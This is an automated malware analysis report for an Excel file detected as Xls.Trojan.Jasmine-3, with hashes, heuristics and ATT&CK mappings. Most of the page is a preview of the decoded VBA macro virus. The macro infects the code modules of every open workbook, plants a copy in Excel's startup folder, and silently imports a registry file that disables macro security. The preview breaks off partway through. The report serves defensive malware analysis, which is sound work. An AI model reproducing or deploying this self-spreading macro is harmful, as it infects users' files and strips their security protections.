Xls.Trojan.Jasmine-3 — Office (OLE) malware analysis

Static analysis result for SHA-256 5f57f13a8f063e63…

MALICIOUS

Office (OLE)

54.0 KB Created: 2000-02-27 18:40:25 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 446ed91364cb7c7784a7ff948ed46e03 SHA-1: 8362b56a84b244a594617bbb52963a3147cb4b1f SHA-256: 5f57f13a8f063e63ac0c7a8d7aebb1d1141ab578af1418be6cff7e14f3fc89c4
200 Risk Score

Malware Insights

Xls.Trojan.Jasmine-3 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The file is an Excel spreadsheet containing VBA macros. A critical heuristic detected the use of the Shell() function within the VBA code, indicating an attempt to execute external commands. The ClamAV detection explicitly names this file as 'Xls.Trojan.Jasmine-3', suggesting it is a known malicious variant. The VBA code appears to be designed to encode and execute a payload, likely involving the creation of a new workbook and potentially interacting with the registry.

Heuristics 3

  • ClamAV: Xls.Trojan.Jasmine-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Jasmine-3
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 88796 bytes
SHA-256: 04c46afce842ab3fc1116276a65997cd81b0af4a3552f3956fd5a1c234d7f9b1
Detection
ClamAV: Xls.Trojan.Jasmine-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'Excel97.Jasmine v1.2
'Copyright (c) 1999, cry0tek

Public Yp3Wi1Ex3Iq8Iw1, Xc4Rc6Nb1Xh7Uc3Yy9 As Boolean
'Jasmine
Private Sub WorkBook_Activate()
On Error Resume Next
Dim Yp6Kq8Nc9Un5Ib7Tb0Ee2Bg4 As Object
Eq7Jw1 = "c:\remove.reg": Nu8Ni7Gv0Ov7Xy0Et9Nn7Mc9Pp4Pt9 = "[HKEY_CURRENT_USER\Software\Microsoft\Office\"
For i = 1 To Workbooks.Count
 Set Yp6Kq8Nc9Un5Ib7Tb0Ee2Bg4 = Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule
 Randomize
 If Yp6Kq8Nc9Un5Ib7Tb0Ee2Bg4.Lines(5, 1) = "'Jasmine" Then
  Call Encode(Yp6Kq8Nc9Un5Ib7Tb0Ee2Bg4)
  Rl0Pe9Ut6Ot3Mv9Vl4Th3Aj5 = Yp6Kq8Nc9Un5Ib7Tb0Ee2Bg4.Lines(1, _
   Yp6Kq8Nc9Un5Ib7Tb0Ee2Bg4.CountOfLines)
  GoTo Dj4Rb0Vn7Kv8Uz2Yx3Ym1
 End If
 For j = 1 To Workbooks(i).VBProject.VBComponents.Count
  Set Se3Hs8Xo2Ir2Rq4Kc9 = Workbooks(i).VBProject.VBComponents.Item(j)
  Wb9 = Se3Hs8Xo2Ir2Rq4Kc9.Name
  Set Yp6Kq8Nc9Un5Ib7Tb0Ee2Bg4 = Se3Hs8Xo2Ir2Rq4Kc9.CodeModule
  If InStr(1, Wb9, "Sheet") Then
   If Yp6Kq8Nc9Un5Ib7Tb0Ee2Bg4.Lines(5, 1) = "'Jasmine" Then _
    Call Encode(Yp6Kq8Nc9Un5Ib7Tb0Ee2Bg4)
    Rl0Pe9Ut6Ot3Mv9Vl4Th3Aj5 = Workbooks(i).VBProject.VBComponents _
    .Item(j).CodeModule.Lines(1, Yp6Kq8Nc9Un5Ib7Tb0Ee2Bg4.CountOfLines)
    GoTo Dj4Rb0Vn7Kv8Uz2Yx3Ym1
  End If
 Next
Next
Dj4Rb0Vn7Kv8Uz2Yx3Ym1:
If UCase(Dir(Application.StartupPath + "\Book1.")) <> UCase("BOOK1") Then
 If Yp3Wi1Ex3Iq8Iw1 <> True Then
  Yp3Wi1Ex3Iq8Iw1 = True: Xc4Rc6Nb1Xh7Uc3Yy9 = True
  Workbooks.Add.SaveAs FileName:=Application.StartupPath & "\BOOK1.", FileFormat:=xlNormal, AddToMru:=False
 End If
End If
For i = 1 To Workbooks.Count
 Set Yp6Kq8Nc9Un5Ib7Tb0Ee2Bg4 = Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule
 If Yp6Kq8Nc9Un5Ib7Tb0Ee2Bg4.Lines(5, 1) <> "'Jasmine" Then
  Yp6Kq8Nc9Un5Ib7Tb0Ee2Bg4.InsertLines 1, Rl0Pe9Ut6Ot3Mv9Vl4Th3Aj5
  Yp6Kq8Nc9Un5Ib7Tb0Ee2Bg4.ReplaceLine 6, "Private Sub Workbook_WindowDeactivate(ByVal Wn As Excel.Window)"
 End If
  For ii = 1 To Workbooks(i).VBProject.VBComponents.Count
   Set Se3Hs8Xo2Ir2Rq4Kc9 = Workbooks(i).VBProject.VBComponents.Item(ii)
   Wb9 = Se3Hs8Xo2Ir2Rq4Kc9.Name
   Set Infline = Se3Hs8Xo2Ir2Rq4Kc9.CodeModule
   If Infline.Lines(5, 1) <> "'Jasmine" Then
    If InStr(1, Wb9, "Sheet") Then
     Se3Hs8Xo2Ir2Rq4Kc9.CodeModule.InsertLines 1, Rl0Pe9Ut6Ot3Mv9Vl4Th3Aj5
     Se3Hs8Xo2Ir2Rq4Kc9.CodeModule.ReplaceLine 6, "Private Sub WorkBook_Activate()"
    End If
   End If
  Next
Next
If Xc4Rc6Nb1Xh7Uc3Yy9 = True Then
 Xc4Rc6Nb1Xh7Uc3Yy9 = False
 Workbooks("Book1.").Close savechanges:=True
 Open Eq7Jw1 For Output As 1
 Print #1, "REGEDIT4"
 If Left(Application.Version, 1) = 9 Then
  Print #1, Nu8Ni7Gv0Ov7Xy0Et9Nn7Mc9Pp4Pt9 & "9.0\Excel\Security]"
  Print #1, """Level""=dword:00000001"
 Else
  Print #1, Nu8Ni7Gv0Ov7Xy0Et9Nn7Mc9Pp4Pt9 & "8.0\Excel\Microsoft Excel]"
  Print #1, """Options6""=dword:00000000"
  Print #1, Nu8Ni7Gv0Ov7Xy0Et9Nn7Mc9Pp4Pt9 & "8.0\New User\Settings\Excel\Microsoft Excel]"
  Print #1, """Options6""=dword:00000000"
  Print #1, Nu8Ni7Gv0Ov7Xy0Et9Nn7Mc9Pp4Pt9 & "8.0\Excel\Microsoft Excel]"
  Print #1, """Options6""=dword:00000000"
 End If
 Close 1
 Shell "regedit /s " & Eq7Jw1, vbHide
 Kill Eq7Jw1
End If
If Minute(Now) = Second(Now) Then
 Select Case Day(Now)
  Case 1 To 5 And Int((5 * Rnd) + 1) = 1
   Application.StatusBar = "Excel97.Jasmine v1.2"
  Case 6 To 10 And Int((5 * Rnd) + 1) = 1
   With Assistant.NewBalloon
    .Heading = "Excel97.Jasmine v1.2"
    .Text = "Since the only time I see her near" & vbCr & "Is when I close my eyes" & vbCr & _
            "Should I keep it that way" & vbCr & "The only way I can make her stay..." & vbCr & vbCr
    .Animation = 22
    .Show
   End With
  Case 11 To 20 And Int((5 * Rnd) + 1) = 1
   For i = 1 To 600 Step Int((Rnd * 2) + 1)
  
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.